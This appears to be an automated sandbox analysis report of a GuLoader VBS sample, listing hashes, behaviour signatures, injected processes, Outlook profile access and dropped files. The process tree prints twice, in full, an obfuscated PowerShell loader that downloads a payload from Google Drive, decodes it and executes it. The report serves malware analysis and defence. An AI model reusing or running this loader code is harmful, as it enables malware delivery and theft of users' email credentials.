Analysis
-
max time kernel
156s -
max time network
152s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
29/03/2024, 02:11
Static task
static1
Behavioral task
behavioral1
Sample
43517d5122fb62dbfcd0e8ab99010ece43d41ed58dc024868f77bc05a0a81612.vbs
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
43517d5122fb62dbfcd0e8ab99010ece43d41ed58dc024868f77bc05a0a81612.vbs
Resource
win10v2004-20231215-en
General
-
Target
43517d5122fb62dbfcd0e8ab99010ece43d41ed58dc024868f77bc05a0a81612.vbs
-
Size
179KB
-
MD5
9cc4d241f55c4430d7ca7245c585253e
-
SHA1
64497621d3145749d5d5b284448f8d7f90aa3e29
-
SHA256
43517d5122fb62dbfcd0e8ab99010ece43d41ed58dc024868f77bc05a0a81612
-
SHA512
4a058df7f657a75287b4d2a5a238469a83df4f160e246ea2240eedcf01bbf3d216a304e6cf0dba218c7a922099e60637e5650fe7f8037d350545939d0168f8f3
-
SSDEEP
3072:XPvtrVR7t/zhP5AbvMZoxnRcRKKh14t8EIuvQcVi1l8ok/1fyLbvj/3s0oV++hyc:/vdVR7tLhxAbvMZoxnRcsK3M8EIOQcVR
Malware Config
Signatures
-
Guloader,Cloudeye
A shellcode based downloader first seen in 2020.
-
Blocklisted process makes network request 1 IoCs
flow pid Process 3 2820 WScript.exe -
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook wab.exe Key opened \REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook wab.exe Key opened \REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook wab.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
flow ioc 6 drive.google.com 7 drive.google.com 13 drive.google.com -
Suspicious use of NtCreateThreadExHideFromDebugger 2 IoCs
pid Process 2488 wab.exe 2488 wab.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 1756 powershell.exe 2488 wab.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 1756 set thread context of 2488 1756 powershell.exe 35 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 1388 powershell.exe 1756 powershell.exe 1756 powershell.exe -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 1756 powershell.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 1388 powershell.exe Token: SeDebugPrivilege 1756 powershell.exe Token: SeDebugPrivilege 2488 wab.exe -
Suspicious use of WriteProcessMemory 20 IoCs
description pid Process procid_target PID 2820 wrote to memory of 1388 2820 WScript.exe 27 PID 2820 wrote to memory of 1388 2820 WScript.exe 27 PID 2820 wrote to memory of 1388 2820 WScript.exe 27 PID 1388 wrote to memory of 2244 1388 powershell.exe 29 PID 1388 wrote to memory of 2244 1388 powershell.exe 29 PID 1388 wrote to memory of 2244 1388 powershell.exe 29 PID 1388 wrote to memory of 1756 1388 powershell.exe 31 PID 1388 wrote to memory of 1756 1388 powershell.exe 31 PID 1388 wrote to memory of 1756 1388 powershell.exe 31 PID 1388 wrote to memory of 1756 1388 powershell.exe 31 PID 1756 wrote to memory of 2332 1756 powershell.exe 32 PID 1756 wrote to memory of 2332 1756 powershell.exe 32 PID 1756 wrote to memory of 2332 1756 powershell.exe 32 PID 1756 wrote to memory of 2332 1756 powershell.exe 32 PID 1756 wrote to memory of 2488 1756 powershell.exe 35 PID 1756 wrote to memory of 2488 1756 powershell.exe 35 PID 1756 wrote to memory of 2488 1756 powershell.exe 35 PID 1756 wrote to memory of 2488 1756 powershell.exe 35 PID 1756 wrote to memory of 2488 1756 powershell.exe 35 PID 1756 wrote to memory of 2488 1756 powershell.exe 35 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook wab.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook wab.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\43517d5122fb62dbfcd0e8ab99010ece43d41ed58dc024868f77bc05a0a81612.vbs"1⤵
- Blocklisted process makes network request
- Suspicious use of WriteProcessMemory
PID:2820 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Mishitting unwrinkleable Energiindholds Funktionskommandoen Fidusmageriers Refreshfejl #>;$Duefalks=(cmd /c set /A 115^^0);Function Genanvendelsesprocessens ([String]$recriminatory){$Duefalks=[char][int]$Duefalks;$Rygsttte=$Duefalks+'ubstring';$Diskomusikken45=8;$Hamunds=Spiderweb($recriminatory);For($Duplikeringscentral=7; $Duplikeringscentral -lt $Hamunds; $Duplikeringscentral+=$Diskomusikken45){$Seapost=$recriminatory.$Rygsttte.Invoke($Duplikeringscentral, 1);$Orddelingsmulighed=$Orddelingsmulighed+$Seapost;}$Orddelingsmulighed;}function Alfridaric ($Lorenas){& ($Forsmdeligheder) ($Lorenas);}function Spiderweb ([String]$Misc50){$Bagstavnens=$Misc50.Length-1;$Bagstavnens;}$Byretternes248=Genanvendelsesprocessens 'DrawgloTL kfabrr Over.iaMilliarnbirderssAnalogifS.ydskaeFlourisrpibekonrCosiermiCan.idanFrist.rg Ba.jer ';$Skeetskydning=Genanvendelsesprocessens 'A.rdromhTrogonotVa,uumatFangstkpLucidnesDemo og:Korrela/Cathrin/LuftfardPosturarskolebeiMagistrvh.arnaaeAfbe,ed.OndartegDaadlsao Ken inocoendurgTryllekl Duplice Mewlin.Ressortc EquivaoCalefacmTransi,/ LittleuMonozy cR,brish?BeroendecisternxAthelinpOversimoRott.nsrMilie.atViolone=GennemsdTubulidoToxodonwAl.opatnLivsforlIndhaleogradv sa CossnedErnring&UncausaiSolbadsdFranssm= Equiba1G,urmanaChurri,GDolkest3 FormidYBartholp S.alke1UrskoveFFerreir1UnseverBac,pensrStern.drDysonstxei.olag6hermene3 Reprsev Snedk,yCransie_NullipedCute.sp9 AfplukHSmaalotVFourteeRRecontrF MorgenpStonema9Formueg6ForudrejVa.utap6TytonidY FyrresyMrkatenO BlystboKo.omip ';$Forsmdeligheder=Genanvendelsesprocessens ' kao.iniK artaleAvlsk,exsquilge ';$Nontarnishing=Genanvendelsesprocessens 'Scenit.$ForfaldgTeheetrlBulbideoSkrdd rb FeltbeaAsthma.l Bogtil: S stemFL.ckfuliPissescrS veflysImportutMiskredeTartarlm NeodadmbnkhammiPriseligBareboaeTrvetris ananas Cosignv=Negrita AmintorS DiaboltSoullikaMahmoudrGyldenbt Cottag-PetitjoBUdmatniiCohenimtSystemesFam,liaTNulpunkrAntist.aBedmmernCurs rfsStr tegf BrontoeKastorlr .ongae Isacsmo-Kewi omSPupalmyoUncongru guignor,arlatac ComplaeUdkigsm Preclea$MastigoS,urrogakRich,rteblankeeeBaalfrdthist,gesSkruehokb aceroyGrublesdS.ltananSmithieiTirana,nDemi.olgAl erne Jor.vrd-WordmonDStruktueEnpia os ngliktAvn.nbeiUku.lignHamburgaIlialattMind.kei U condo lassisnSponsib .urmoil$BrndeknPGedeostoShanghadKa,tisma Bacillr Trillug.inroweiMozingmdKrameria BenzoxeResolub ';Alfridaric (Genanvendelsesprocessens 'Vuggest$ hjl.elgAlman el .odetiopressesbFit,roya velprolKi.djal:Ter,binPEv,lueroSyltegldCessnanaqui decrstrengtgS nsoreiUncrushd Bygde,aBesveg.eRimbase= Butter$SuppuraeOscillanHensigtvL.rekla: Lynassa DorylipStarttipAutistid DirectaFaa.andtAgainwaaP,octos ') ;Alfridaric (Genanvendelsesprocessens 'urbinatITopissimFdeklinp guanodo Hee.esr Un.xpetCarbone- Pr.mavMAfstignoSidsenudPraelecubotundelSubnutre Organo ChestcoBAeroplai ReparttIsolatisKassablTBlomsterSvabretaSekretsnKortskasAlg,genf SamordeE tusiarMomzerp ') ;$Podargidae=$Podargidae+'\Frosts.sig' ;Alfridaric (Genanvendelsesprocessens 'Sn,rkle$Contrafg anlgsglFo udskoRremas.bKontradaStrouthlTethyst: I orgaLPe agogoDive,gewOverma.e Civilrr Cryb bibrugeranPerspekgLesedpr= Eupadm(Frotte.TThymeeve.ntipsys AccosttFrdigef- und.rcPBioetikabryst utrrfabrihOpsnuse Prevail$UnapparPEnzymetoAuningsdindstila He.oalrMonacidgPalatali.posercdBrugtesaRemed,teExisti.)Micropr ') ;while (-not $Lowering) {Alfridaric (Genanvendelsesprocessens ',lliticIBiogr.ffOmk,stn Intra,(expande$Be,trowFTroubleirystelsrBeskyttsMocmaintVrimlete atriarmHoodw.nm UsneamiFo lngegSolisteeCrispatsOrigina. ryptogJ pol vio.eavelybItho iiS InsolethornhinaBromofotSp kedaeAmaryll Phoenic-Sv vlile YnglinqKondens Turnech$Trendi B pastedySilverer Di inye .ctopotCo,sumetAfspil,e ,drmmerAnisaldnHayb teeStenedesGanoma,2 Apotra4sensefu8Blommes) Rackma Knaste.{GambierSA tsfortBredsaaaHype inrQuadrattPaaskel-ProrateSTakkefelBilulykeProstomeDingoerp ,iggar Unvanta1Psychop}HeroicaeKollapslDeairsssBindemieLarynxe{LnkontoSLommetotPausemeaIndkomsr ignomitnoncomp-,insnarS Ha.vhjlKosysteeDimensiean syrep ,apote Stymper1Undocto;SnakeflACalycinlLogp.rcfTraadner SvageliT gneendTetrapoaF,nansirExp undi NonanicRikoc e Sarasd$EjendomNRbretnio Y.rwhinMerthiotStrgbutaTheophirOozierbnBorog vi,arasitsUvi,kaahWhitis,iforsik.nPlanarigBasella}Yndetel ');Alfridaric (Genanvendelsesprocessens ' Fremsk$SolennegOver,eel PolliwoKo.legibHushcloaSaettemlSponsor:CatheteLHistorioIntercrwPolygone Ostr.crFornje iUlcusdenMegawatgCurforb=Buttonc(Whit.biTtavleskeKommercsPremud.t Titrer-PalladiP AerligaOrdnerntChoristh Regra, A renes$S,ovlplP Wa.erpo Afsk edBund maa BlrervrHjerneagphratriiU snobbdAmmoni,aDolklipeBetving)Sweenys ') ;}Alfridaric (Genanvendelsesprocessens 'I,filtr$CuniculgE.termilUnimbanodosmerebNoncohaaVaude.ilSo,dayf:KoldsveT Gastr.uactino nAerobiogicccadvh HypoamrEsse.eniUd.amrig,vibelghTrioboleDromedadsi natueFinge.sn phos hsDeconta Kodesk=P,ntill RetrostGP rametephosphat Fideju-MngdebeCStenfisoTilsid.nH.gemontAppetiseselvrosnKonebyttAppetiz autarki$Cor,deePLi.refooLaborerd BiltraaGaapa mrRgerierg A.skali.atalied Avn.gea vocatiePhanto ');Alfridaric (Genanvendelsesprocessens 'Istanbu$ Mos uig.uodesflMedullioTinw,reb,rneblaaTanzan l mortif:,ydisolGTyrann,uVict,aldNo dames LandskjUngree aSnavsvam ReproamAllianceS,rngemr vestial Omegnsi L.isteg Inddrie Jum surCognacsePondero Opionsm=Maaneds H,stopa[ Dul,imSSunfishy AttraasMawbountOuttea,eMortensm Suprav.OverhumCHyenineoMilieubn b nelevK,dnappeamphigar AntikltSkotren] Recapi:Oratric:SnoolsuFStyledrrha dlefocla.ichmM.srealBsternebaBleganss Rekvise Cornma6Pu,ridh4ThumbedSSpidsent S.irebr KunstaiRhizocanT.nfoldgOutwinb(Co.simi$ sportsTLabdanuuUnregennSo ostegTr.kkenhSvans arCensureiHeimorcgPre edehUnone,oeBoreensdUnsalareopsigernSidestisUnamend) enants ');Alfridaric (Genanvendelsesprocessens 'vineyar$MeatoscgDisorielMacrospoCr.wbarb Strafba.avortelRoe,ree:systemaSOverskrtde,alityBluebusrEx enseeOrielhvk ordkrioKolonisrFlayflitBurrknoeDividenn Lselame M.ning Stvkon=Superga Parabol[CommonaS VaabenyGe,aniesJablonstLnkontoe.sskabem Colpor.Discli.TAllitteeAnstdelx Boile.t Enz me.Reg,ormECiselernBryststcComp,omo Parasid.lagetsiTaxa.lyn Depl,mgCyphell]Indlgsb:trophyw:ParasolASaetninSWolfsprCData,orIPredefeIAtionsv.AnatropGSunkl.neCayleystFerraraS.pildnetFusi.lyrEjendetiweedlesn Nons,mgRaderer( Housew$ Nonam,GBeva,rou ffhandd.elsstrsVladbj,jMakvr,saS.lkwormForga.gmSprensaeVerju crJoaninalTillrt iUnca ceg PappoueHypercorGeropigeSpritkr).aplont ');Alfridaric (Genanvendelsesprocessens 'Frysesk$LaudanugReburyilPresecuoPana hebScarolaaCif erllJaevnli:Syn.ectMLokumscaOversetrefterslgFokuseriUdvi.linDuennasaNavigatlPad acyiRevengesBoulezkeTilbagerCurvateePr dukttBenzoph=Lituusc$Unho.tiS RestautRegnskayAff.ktirEfterkoeNucleopkRekviemo ro gerrFl.ggintSplejsveOpfriskn SkppedeCimolit. Liges,sVi ediruKlampenb RibonusDuodynatDamb ugr Fond bigennembnBre baagBnne.ta(Grun va3Ffeun i0haandka8Diapaus1Ny urde9De iner7 tilfil,Leucoto3Lopside1Udgan.s9M rgrie2Spklage9smaagri)Matr.li ');Alfridaric $Marginaliseret;"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1388 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c set /A 115^^03⤵PID:2244
-
-
C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "<#Mishitting unwrinkleable Energiindholds Funktionskommandoen Fidusmageriers Refreshfejl #>;$Duefalks=(cmd /c set /A 115^^0);Function Genanvendelsesprocessens ([String]$recriminatory){$Duefalks=[char][int]$Duefalks;$Rygsttte=$Duefalks+'ubstring';$Diskomusikken45=8;$Hamunds=Spiderweb($recriminatory);For($Duplikeringscentral=7; $Duplikeringscentral -lt $Hamunds; $Duplikeringscentral+=$Diskomusikken45){$Seapost=$recriminatory.$Rygsttte.Invoke($Duplikeringscentral, 1);$Orddelingsmulighed=$Orddelingsmulighed+$Seapost;}$Orddelingsmulighed;}function Alfridaric ($Lorenas){& ($Forsmdeligheder) ($Lorenas);}function Spiderweb ([String]$Misc50){$Bagstavnens=$Misc50.Length-1;$Bagstavnens;}$Byretternes248=Genanvendelsesprocessens 'DrawgloTL kfabrr Over.iaMilliarnbirderssAnalogifS.ydskaeFlourisrpibekonrCosiermiCan.idanFrist.rg Ba.jer ';$Skeetskydning=Genanvendelsesprocessens 'A.rdromhTrogonotVa,uumatFangstkpLucidnesDemo og:Korrela/Cathrin/LuftfardPosturarskolebeiMagistrvh.arnaaeAfbe,ed.OndartegDaadlsao Ken inocoendurgTryllekl Duplice Mewlin.Ressortc EquivaoCalefacmTransi,/ LittleuMonozy cR,brish?BeroendecisternxAthelinpOversimoRott.nsrMilie.atViolone=GennemsdTubulidoToxodonwAl.opatnLivsforlIndhaleogradv sa CossnedErnring&UncausaiSolbadsdFranssm= Equiba1G,urmanaChurri,GDolkest3 FormidYBartholp S.alke1UrskoveFFerreir1UnseverBac,pensrStern.drDysonstxei.olag6hermene3 Reprsev Snedk,yCransie_NullipedCute.sp9 AfplukHSmaalotVFourteeRRecontrF MorgenpStonema9Formueg6ForudrejVa.utap6TytonidY FyrresyMrkatenO BlystboKo.omip ';$Forsmdeligheder=Genanvendelsesprocessens ' kao.iniK artaleAvlsk,exsquilge ';$Nontarnishing=Genanvendelsesprocessens 'Scenit.$ForfaldgTeheetrlBulbideoSkrdd rb FeltbeaAsthma.l Bogtil: S stemFL.ckfuliPissescrS veflysImportutMiskredeTartarlm NeodadmbnkhammiPriseligBareboaeTrvetris ananas Cosignv=Negrita AmintorS DiaboltSoullikaMahmoudrGyldenbt Cottag-PetitjoBUdmatniiCohenimtSystemesFam,liaTNulpunkrAntist.aBedmmernCurs rfsStr tegf BrontoeKastorlr .ongae Isacsmo-Kewi omSPupalmyoUncongru guignor,arlatac ComplaeUdkigsm Preclea$MastigoS,urrogakRich,rteblankeeeBaalfrdthist,gesSkruehokb aceroyGrublesdS.ltananSmithieiTirana,nDemi.olgAl erne Jor.vrd-WordmonDStruktueEnpia os ngliktAvn.nbeiUku.lignHamburgaIlialattMind.kei U condo lassisnSponsib .urmoil$BrndeknPGedeostoShanghadKa,tisma Bacillr Trillug.inroweiMozingmdKrameria BenzoxeResolub ';Alfridaric (Genanvendelsesprocessens 'Vuggest$ hjl.elgAlman el .odetiopressesbFit,roya velprolKi.djal:Ter,binPEv,lueroSyltegldCessnanaqui decrstrengtgS nsoreiUncrushd Bygde,aBesveg.eRimbase= Butter$SuppuraeOscillanHensigtvL.rekla: Lynassa DorylipStarttipAutistid DirectaFaa.andtAgainwaaP,octos ') ;Alfridaric (Genanvendelsesprocessens 'urbinatITopissimFdeklinp guanodo Hee.esr Un.xpetCarbone- Pr.mavMAfstignoSidsenudPraelecubotundelSubnutre Organo ChestcoBAeroplai ReparttIsolatisKassablTBlomsterSvabretaSekretsnKortskasAlg,genf SamordeE tusiarMomzerp ') ;$Podargidae=$Podargidae+'\Frosts.sig' ;Alfridaric (Genanvendelsesprocessens 'Sn,rkle$Contrafg anlgsglFo udskoRremas.bKontradaStrouthlTethyst: I orgaLPe agogoDive,gewOverma.e Civilrr Cryb bibrugeranPerspekgLesedpr= Eupadm(Frotte.TThymeeve.ntipsys AccosttFrdigef- und.rcPBioetikabryst utrrfabrihOpsnuse Prevail$UnapparPEnzymetoAuningsdindstila He.oalrMonacidgPalatali.posercdBrugtesaRemed,teExisti.)Micropr ') ;while (-not $Lowering) {Alfridaric (Genanvendelsesprocessens ',lliticIBiogr.ffOmk,stn Intra,(expande$Be,trowFTroubleirystelsrBeskyttsMocmaintVrimlete atriarmHoodw.nm UsneamiFo lngegSolisteeCrispatsOrigina. ryptogJ pol vio.eavelybItho iiS InsolethornhinaBromofotSp kedaeAmaryll Phoenic-Sv vlile YnglinqKondens Turnech$Trendi B pastedySilverer Di inye .ctopotCo,sumetAfspil,e ,drmmerAnisaldnHayb teeStenedesGanoma,2 Apotra4sensefu8Blommes) Rackma Knaste.{GambierSA tsfortBredsaaaHype inrQuadrattPaaskel-ProrateSTakkefelBilulykeProstomeDingoerp ,iggar Unvanta1Psychop}HeroicaeKollapslDeairsssBindemieLarynxe{LnkontoSLommetotPausemeaIndkomsr ignomitnoncomp-,insnarS Ha.vhjlKosysteeDimensiean syrep ,apote Stymper1Undocto;SnakeflACalycinlLogp.rcfTraadner SvageliT gneendTetrapoaF,nansirExp undi NonanicRikoc e Sarasd$EjendomNRbretnio Y.rwhinMerthiotStrgbutaTheophirOozierbnBorog vi,arasitsUvi,kaahWhitis,iforsik.nPlanarigBasella}Yndetel ');Alfridaric (Genanvendelsesprocessens ' Fremsk$SolennegOver,eel PolliwoKo.legibHushcloaSaettemlSponsor:CatheteLHistorioIntercrwPolygone Ostr.crFornje iUlcusdenMegawatgCurforb=Buttonc(Whit.biTtavleskeKommercsPremud.t Titrer-PalladiP AerligaOrdnerntChoristh Regra, A renes$S,ovlplP Wa.erpo Afsk edBund maa BlrervrHjerneagphratriiU snobbdAmmoni,aDolklipeBetving)Sweenys ') ;}Alfridaric (Genanvendelsesprocessens 'I,filtr$CuniculgE.termilUnimbanodosmerebNoncohaaVaude.ilSo,dayf:KoldsveT Gastr.uactino nAerobiogicccadvh HypoamrEsse.eniUd.amrig,vibelghTrioboleDromedadsi natueFinge.sn phos hsDeconta Kodesk=P,ntill RetrostGP rametephosphat Fideju-MngdebeCStenfisoTilsid.nH.gemontAppetiseselvrosnKonebyttAppetiz autarki$Cor,deePLi.refooLaborerd BiltraaGaapa mrRgerierg A.skali.atalied Avn.gea vocatiePhanto ');Alfridaric (Genanvendelsesprocessens 'Istanbu$ Mos uig.uodesflMedullioTinw,reb,rneblaaTanzan l mortif:,ydisolGTyrann,uVict,aldNo dames LandskjUngree aSnavsvam ReproamAllianceS,rngemr vestial Omegnsi L.isteg Inddrie Jum surCognacsePondero Opionsm=Maaneds H,stopa[ Dul,imSSunfishy AttraasMawbountOuttea,eMortensm Suprav.OverhumCHyenineoMilieubn b nelevK,dnappeamphigar AntikltSkotren] Recapi:Oratric:SnoolsuFStyledrrha dlefocla.ichmM.srealBsternebaBleganss Rekvise Cornma6Pu,ridh4ThumbedSSpidsent S.irebr KunstaiRhizocanT.nfoldgOutwinb(Co.simi$ sportsTLabdanuuUnregennSo ostegTr.kkenhSvans arCensureiHeimorcgPre edehUnone,oeBoreensdUnsalareopsigernSidestisUnamend) enants ');Alfridaric (Genanvendelsesprocessens 'vineyar$MeatoscgDisorielMacrospoCr.wbarb Strafba.avortelRoe,ree:systemaSOverskrtde,alityBluebusrEx enseeOrielhvk ordkrioKolonisrFlayflitBurrknoeDividenn Lselame M.ning Stvkon=Superga Parabol[CommonaS VaabenyGe,aniesJablonstLnkontoe.sskabem Colpor.Discli.TAllitteeAnstdelx Boile.t Enz me.Reg,ormECiselernBryststcComp,omo Parasid.lagetsiTaxa.lyn Depl,mgCyphell]Indlgsb:trophyw:ParasolASaetninSWolfsprCData,orIPredefeIAtionsv.AnatropGSunkl.neCayleystFerraraS.pildnetFusi.lyrEjendetiweedlesn Nons,mgRaderer( Housew$ Nonam,GBeva,rou ffhandd.elsstrsVladbj,jMakvr,saS.lkwormForga.gmSprensaeVerju crJoaninalTillrt iUnca ceg PappoueHypercorGeropigeSpritkr).aplont ');Alfridaric (Genanvendelsesprocessens 'Frysesk$LaudanugReburyilPresecuoPana hebScarolaaCif erllJaevnli:Syn.ectMLokumscaOversetrefterslgFokuseriUdvi.linDuennasaNavigatlPad acyiRevengesBoulezkeTilbagerCurvateePr dukttBenzoph=Lituusc$Unho.tiS RestautRegnskayAff.ktirEfterkoeNucleopkRekviemo ro gerrFl.ggintSplejsveOpfriskn SkppedeCimolit. Liges,sVi ediruKlampenb RibonusDuodynatDamb ugr Fond bigennembnBre baagBnne.ta(Grun va3Ffeun i0haandka8Diapaus1Ny urde9De iner7 tilfil,Leucoto3Lopside1Udgan.s9M rgrie2Spklage9smaagri)Matr.li ');Alfridaric $Marginaliseret;"3⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1756 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c set /A 115^^04⤵PID:2332
-
-
C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\windows mail\wab.exe"4⤵
- Accesses Microsoft Outlook profiles
- Suspicious use of NtCreateThreadExHideFromDebugger
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
- outlook_office_path
- outlook_win_path
PID:2488
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD50250596cd7064b5a57b4367a7ca7af90
SHA15e8c88112e62648215b76323353ceedeb0261ce6
SHA256ef0b6ea2ee2c0cc0a4d9335e5c07599f8aa12adf6473a6a768937463652fcea3
SHA512d3c1afad19c1a08d15628bd762bbec9e9c2c32a6c7fac3247f6052314199194616234eee928740e233bfb78a8c0a41bdea34987525216690d44f6062a5e42763
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize344B
MD5e9a2db3c218cd02fbd23c3ffdd7f9e02
SHA18abc9172b0d4631ab0ab99988b25be4529e03644
SHA256ec015b733fe5f63d3d928e1cd6148e257aa9ee047104c1d4804a82a0471ac76d
SHA5125a59c89daeab23978422138d6b640c6d67ffc6b15078cd4ceeb8d1ba42445ab7a7a1ffcdc93ffdf202dfd45b470359d3d3d1dd73854bbdcdb9a95da520eea1a6
-
Filesize
68KB
MD529f65ba8e88c063813cc50a4ea544e93
SHA105a7040d5c127e68c25d81cc51271ffb8bef3568
SHA2561ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184
SHA512e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa
-
Filesize
386B
MD5c182cc2051a1f2cb0f78364db81b9fc1
SHA1afef4d6a4f66aa307df4ed1179256d4667444585
SHA2565e29ffa5f6109f87e5d4205a591bbc8fcb529e3643462f6487b5479eb46d79be
SHA51240b2d28acdfa3eda9997c385a67e86c0a120e1a12cc3c51ff2d649c262f458089be88c63ac042b43fed19386e6664bba6a632db67357f71f53c4719f30b37eac
-
Filesize
682B
MD58554355ff9009da1b1c8536a9bb2e2fd
SHA1539aef5de341d53a43fa26a2d5e6ddd7f82a508d
SHA256aa4e604ec667d549b72c32b33e76269b0cdabc5c747b67889e7bfad238760d39
SHA512256472a8fa9f1381fedf8ed14858786f63ed4fa176eb5940abf5d90dc2547356458a9cbf5ec39de949e7a79c698fe91c708ebd8114d759d310c9f308e44bdb94
-
Filesize
1KB
MD5e55e9d1ae5fe8f525a35539ef7cb8a26
SHA1eae2cc90fe2fff8c8391a4ba827aa06064c729bc
SHA2564a45982b8c4124238f30262f24e37fd9dd3461728376854a3b7efb0fadc7c585
SHA512bfebd15265f78a76f237c2bd695b813f0580cece1a53ca61291011c1edfa8845e2e436ea609b3cfb4be94001106ec8373438dc8483656ba33209db29c815cf89
-
Filesize
5KB
MD541077e923293898955e78267b7878339
SHA136083128a00b83103bfe8bc36b0042ff6a703012
SHA2564d9b1845d8c7b9f85c23bf670d2df4757bfdd59ac5ccebee2df7cbb3b26292f0
SHA512070c9f8fc7fb22dda57f57c950250b4476f4790c91b0e26616db50a053a4b385b302f30d19a82475252e21942532925d64e9216938f37d751af2e2af31f7c922
-
Filesize
177KB
MD5435a9ac180383f9fa094131b173a2f7b
SHA176944ea657a9db94f9a4bef38f88c46ed4166983
SHA25667dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34
SHA5121a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a
-
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-406356229-2805545415-1236085040-1000\0f5007522459c86e95ffcc62f32308f1_4c23b8b8-1f37-4b25-86d9-da21829a4de6
Filesize46B
MD5d898504a722bff1524134c6ab6a5eaa5
SHA1e0fdc90c2ca2a0219c99d2758e68c18875a3e11e
SHA256878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9
SHA51226a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61
-
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-406356229-2805545415-1236085040-1000\0f5007522459c86e95ffcc62f32308f1_4c23b8b8-1f37-4b25-86d9-da21829a4de6
Filesize46B
MD5c07225d4e7d01d31042965f048728a0a
SHA169d70b340fd9f44c89adb9a2278df84faa9906b7
SHA2568c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a
SHA51223d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\EM8DQYYW9H7S7EBS6TKR.temp
Filesize7KB
MD51af72430a9d0a1b2bbd984d5e23e81aa
SHA1bf5d0480b4dc3bb98d8b439fe71af29058f4baf8
SHA25635df3e1bc498ec96e4c32c1185b5fa898b27336db00fe71d26f118cff3ed0ce3
SHA51265904ba5927e73ee66ba5545ef3d74605e343838883a89402f594246ecb1ccc2e38cab39279eacf0751b440d5b4ae6779cb0e9ff25db959d12eae571f1fe3e06